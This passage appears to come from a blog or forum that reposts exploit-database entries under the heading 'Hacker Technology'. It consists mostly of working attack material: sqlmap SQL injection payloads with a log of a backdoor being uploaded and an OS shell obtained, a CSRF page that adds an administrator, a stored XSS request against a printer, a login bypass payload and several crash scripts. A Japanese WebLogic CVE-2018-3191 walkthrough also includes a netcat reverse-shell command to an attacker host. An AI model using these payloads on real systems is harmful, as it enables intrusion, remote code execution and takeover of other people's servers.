(SELECT(SLEEP(5)))vpfG) AND 'kOJS'='kOJS&username=admin&emailid=admin@test.com&mobilenumber=1234567899&update= --- --- Parameter: mobilenumber (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: adminname=Admin&username=admin&emailid=admin@test.com&mobilenumber=1234567899' AND (SELECT 1163 FROM (SELECT(SLEEP(5)))rdwj) AND 'mnwu'='mnwu&update= ---
  13. HireHackking

    Hostel Management System 2.0 - 'id' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection # Google Dork: intitle: "Hostel management system" # Date: 2020-01-03 # Exploit Author: FULLSHADE # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/hostel-management-system/ # Version: v2.0 # Tested on: Windows # CVE : N/A Description: The Hostel Management System v2.0 application from PHPgurukul is vulnerable to SQL injection via the 'id' parameter on the full-profile.php page. ==================== 1. SQLi ==================== http://10.0.0.214/Hostel%20management%20System%20Project/hostel/full-profile.php?id=1 THe ?id parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated user has the full ability to run system commands via --os-shell and fully compromise the system GET parameter 'id' is vulnerable. --- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: id=-3444' OR 1650=1650# Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' OR (SELECT 3801 FROM(SELECT COUNT(*),CONCAT(0x7176627a71,(SELECT (ELT(3801=3801,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- klCZ Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: id=1' OR SLEEP(5)-- slKU Type: UNION query Title: MySQL UNION query (NULL) - 29 columns Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x63786c795a416371494752765744487a4e6443636e705076586e714d735a7053595a4b676b526157,0x71707a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# [14:20:08] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpulczr.php [14:20:08] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpbjdvm.php [14:20:08] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER os-shell> whoami do you want to retrieve the command standard output? [Y/n/a] y command standard output: 'john-pc\john' os-shell>
  14. HireHackking

    Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path #Exploit Author : ZwX #Exploit Date: 2020-01-05 #Vendor Homepage : http://webcompanion.com/ #Link Software : http://webcompanion.com/LP-WC002/index.php?partner=LU150701WEBDIRECT&campaign=www.doc2pdf.com&search=2&homepage=2&bd=2 #Tested on OS: Windows 10 #Analyze PoC : ============== C:\Users\ZwX>sc qc WCAssistantService [SC] QueryServiceConfig réussite(s) SERVICE_NAME: WCAssistantService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : WC Assistant DEPENDENCIES : SERVICE_START_NAME : LocalSystem
  15. HireHackking

    Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin) # Date: 2020-01-05 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://intelliants.com/ # Software Link : https://github.com/intelliants/subrion/releases/tag/v4.0.5 # Software : Subrion CMS # Product Version: v 4.0.5.10 # Vulernability Type : Cross-Site Request Forgery (Add Admin) # Vulenrability : Cross-Site Request Forgery # CVE : N/A # Description : # CSRF vulnerability was discovered in v4.0.5 version of Subrion CMS. # With this vulnerability, authorized users can be added to the system. HTML CSRF PoC : <html> <body> <script>history.pushState('', '', '/')</script> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https:\/\/SERVER\/_core\/admin\/members\/add\/", true); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------9973334999367242361642875270"); xhr.withCredentials = true; var body = "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"__st\"\r\n" + "\r\n" + "41209a5f43b0d7c8cef0e7ffcd9ce160\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"username\"\r\n" + "\r\n" + "ismailtasdelen\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"fullname\"\r\n" + "\r\n" + "Ismail Tasdelen\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"email\"\r\n" + "\r\n" + "test@mail.com\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"_password\"\r\n" + "\r\n" + "Test1234!\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"_password2\"\r\n" + "\r\n" + "Test1234!\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"usergroup_id\"\r\n" + "\r\n" + "1\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"v[avatar[]]\"\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"avatar[]\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"website\"\r\n" + "\r\n" + "https://ismailtasdelen.com\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"phone\"\r\n" + "\r\n" + "0000000000000000000\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"biography\"\r\n" + "\r\n" + "NULL\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"facebook\"\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"twitter\"\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"gplus\"\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"linkedin\"\r\n" + "\r\n" + "\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"sponsored\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"plan_id\"\r\n" + "\r\n" + "2\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"sponsored_end\"\r\n" + "\r\n" + "2020-02-05 05:18:43\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"featured\"\r\n" + "\r\n" + "0\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"featured_end\"\r\n" + "\r\n" + "2020-02-05 05:19\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"status\"\r\n" + "\r\n" + "active\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"save\"\r\n" + "\r\n" + "Add\r\n" + "-----------------------------9973334999367242361642875270\r\n" + "Content-Disposition: form-data; name=\"goto\"\r\n" + "\r\n" + "list\r\n" + "-----------------------------9973334999367242361642875270--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html>
  16. HireHackking

    NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install BlueAuditor 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Key' and click on 'Ok' 6.BlueAuditor Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")
  17. HireHackking

    IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting # Date: 2020-01-02 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://www.ibm.com/il-en # Hardware Link: https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?infotype=AN&subtype=CA&htmlfid=897/ENUS105-476&appname=USN # Vulernability Type: Cross-site Scripting # Vulenrability: Stored XSS # CVE: N/A # Description : # Ricoh (IBM) InfoPrint 1532 devices allow Stored XSS via the 1.network.6.10 parameter to the # cgi-bin/posttest/cgi-bin/dynamic/config/gen/general.html URI. (HTML Injection can also occur.) HTTP Request : POST /cgi-bin/posttest/cgi-bin/dynamic/config/gen/general.html HTTP/1.1 Host: 134.84.35.70 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 281 Origin: https://134.84.35.70 Connection: close Referer: https://134.84.35.70/cgi-bin/dynamic/config/gen/general.html Upgrade-Insecure-Requests: 1 0.printer.1.14=0&0.mfp.1.2=0&0.mfp.1.3=0&0.mfp.1.1=30&0.mfp.100.11=30&0.printer.4.258=1&1.network.6.10=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E&1.network.6.11=&0.network.6.4=90&1.network.6.69=000000000000&2.network.6.63=0&0.network.10.73=120&1.printer.1.40= HTTP Response : HTTP/1.0 200 OK Content-Type: text/html Content-Length: 269
  18. HireHackking

    SpotIE 2.9.5 - 'Key' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: SpotIE 2.9.5 - 'Key' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/spotie_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install BlueAuditor 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Key' and click on 'Ok' 6.BlueAuditor Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")
  19. HireHackking

    ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install ShareAlarmPro 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Key' and click on 'Ok' 6.ShareAlarmPro Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")
  20. HireHackking

    elaniin CMS 1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: elaniin CMS 1.0 - Authentication Bypass # Author: riamloo # Date: 2020-01-02 # Vendor Homepage: https://elaniin.com/ ( github ==> https://github.com/elaniin/ ) # Software Link: https://github.com/elaniin/CMS/archive/master.zip # Version: 1 # CVE: N/A # Tested on: Win 10 # Discription: # Open-source Content Management System created with PHP + MySQL https://elaniin.com/ # Vulnerability: Attacker can bypass login page and access to dashboard page # vulnerable file : login.php # Parameter & Payload: '=''or' # Proof of Concept: http://localhost/elaniin/login.php POST /elaniin/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; Content-Length: 334 Referer: http://localhost/elaniin/login.php Cookie: PHPSESSID=81spdqht0gvh0f97vg62nzxs8 Connection: close Upgrade-Insecure-Requests: 1 email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN
  21. HireHackking

    BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/blueauditor_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install BlueAuditor 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Name' and click on 'Ok' 6.BlueAuditor Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")
  22. HireHackking

    Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Dnss Domain Name Search Software - 'Key' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install Dnss 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Key' and click on 'Ok' 6.Dnss Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")
  23. HireHackking

    タイトル:Weblogic CVE-2018-3191リモートコードコマンド実行脆弱性再帰

    HireHackking posted a blog entry in Hacker Technology
    0x00はじめに 10月17日、北京時間、高リスクのウェブロジックリモートコード実行脆弱性(CVE-2018-3191)が10月のキー補足更新CPU(重要なパッチアップデート)で修正されました。この脆弱性により、未認識の攻撃者は、T3プロトコルネットワークを介して脆弱なWebLogicサーバーにアクセスおよび侵害することができます。エクスプロイトが成功すると、ウェブロジックサーバーが攻撃者に引き継がれ、リモートコードが実行される可能性があります。 0x01脆弱性の再発 ターゲットWeblogciサーバーがT3サービスを開きました。サーバーはLinuxに展開されます。テスト環境は、https://github.com/vulhub/vulhub/tree/master/weblogic/cve-2018-262を使用してDockerの下に展開できます。 1. JRMPLISTENERホストで次のコマンド:を実行します(パブリックネットワークのホスト、Ubunut System、IPアドレス:149.28。*。85)。 wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-snapshot-beta-all.jar Java -cp ysoserial-0.0.6-Snapshot-beta-all.jar ysoserial.exploit.jrmplistener [リッスンポート] commonscollections1 [command] のように: Java -cp ysoserial-0.0.6-Snapshot-beta-all.jar ysoserial.exploit.jrmplistener 1099 commonscollections1 'nc -nv 149.28。*。 //コマンドは現在NCのリバウンドのみに成功していることに注意してください。バッシュリバウンドが逃げられ、ポート1099を聴くローカルが聴き、実行されたコマンドはNCリバウンドコマンドをWeblogicサーバーに送信することです。 2。同時に、JRMPLISTENERホストに別のコマンドウィンドウを開き、NCポートを聴きます。コマンドは次のとおりです。 NC -LVVP 5555 3.このスクリプトをローカルWindowsシステム攻撃者ホストで実行します。 weblogic-spring-jndi-12.2.1.3.jar for weblogic: 12.2.1.3 weblogic-spring-jndi-10.3.6.0.jar for weblogic: 10.3.6.0 12.2.1.0 12.1.3.0 12.2.1.1 wget https://github.com/pyn3rd/cve-2018-3191/blob/master/weblogic-spring-jndi-10.3.6.0.jar wget https://github.com/pyn3rd/cve-2018-3191/blob/master/weblogic-spring-jndi-12.2.1.3.jar wget https://raw.githubusercontent.com/libraggbond/cve-2018-3191/master/exploit.py python exploit.py [犠牲者IP] [被害者ポート] [ysoserialへのパス] [jrmplistener ip] [jrmplistenerポート] [jrmpclient] python exploit.py 66.42。 149.28。*。85はjrmplistenerホストであり、ホストのリスニングポートは1099です 最後に、リバウンドShell:を見ることができます 0x02脆弱性修正 1。Oracleの職員は、10月のキーパッチアップデートCPU(重要なパッチアップデート)の脆弱性を修正しました。 https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html#appendixfmw 2。T3プロトコルを禁止します 0x03参照リンク https://MP.WEIXIN.QQ.COM/S/EBKHJPBQCSZAY_VPOCW0SG https://github.com/libraggbond/cve-2018-3191
  24. HireHackking

    TextCrawler Pro3.1.1 - Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: TextCrawler Pro3.1.1 - Denial of Service (PoC) # Date: 2020-05-01 # Vendor Homepage:https://www.digitalvolcano.co.uk/index.html # Software Link: https://www.digitalvolcano.co.uk/download/TextCrawlerPro=setup.exe # Exploit Author: Achilles # Tested Version: 3.1.1 # Tested on: Windows 7 x64 # 1.- Run python code :TextCrawler.py # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open TextCrawler Pro # 4.- Paste the content of EVIL.txt into the Field: 'License key' # 5.- Click 'Activate' and you will see a crash. #!/usr/bin/env python buffer =3D "\x41" * 6000 try: open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"
  25. HireHackking

    Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Dnss Domain Name Search Software - 'Name' Denial of Service (PoC) # Exploit Author : Ismail Tasdelen # Exploit Date: 2020-01-06 # Vendor Homepage : http://www.nsauditor.com/ # Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe # Tested on OS: Windows 10 # CVE : N/A ''' Proof of Concept (PoC): ======================= 1.Download and install Dnss 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Register -> Enter Registration Code 4.Copy and paste the characters in the file (poc.txt) 5.Paste the characters in the field 'Name' and click on 'Ok' 6.Dnss Crashed ''' #!/usr/bin/python buffer = "A" * 1000 payload = buffer try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")